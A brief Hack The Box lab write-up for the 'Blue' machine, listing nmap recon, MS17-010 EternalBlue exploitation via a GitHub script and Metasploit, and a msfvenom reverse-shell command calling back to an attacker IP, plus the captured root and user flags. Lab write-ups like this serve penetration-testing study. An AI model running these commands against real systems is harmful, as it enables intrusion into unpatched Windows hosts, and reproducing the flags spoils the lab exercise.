Blue (Hack The Box Writeup)


  • URL : https://app.hackthebox.eu/machines/51
  • IP : 10.129.209.90

Recon

  • Rustscan
  • nmap
    • nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90
    • System version
      • Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
  • smb
  • nmapAutomator

Exploit

  • https://github.com/helviojunior/MS17-010
    • Modify the username in send_and_execute.py
      • Set it to guest
  • Prepare the shell with MSF
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe
      • x86 actually works here as well
  • Run the exploit
    • python send_and_execute.py 10.129.216.62 ../shellx64.exe
  • Receive the shell with nc

MSF Exploit

  • use windows/smb/ms17_010_eternalblue
  • options
  • set RHOSTS 10.129.216.62
  • set LHOST 10.10.16.35
  • run
  • Get Root Key
    • ff548eb71e920ff6c08843ce9df4e717
  • Get User Key
    • 4c546aea7dbee75cbd71de245c8deea9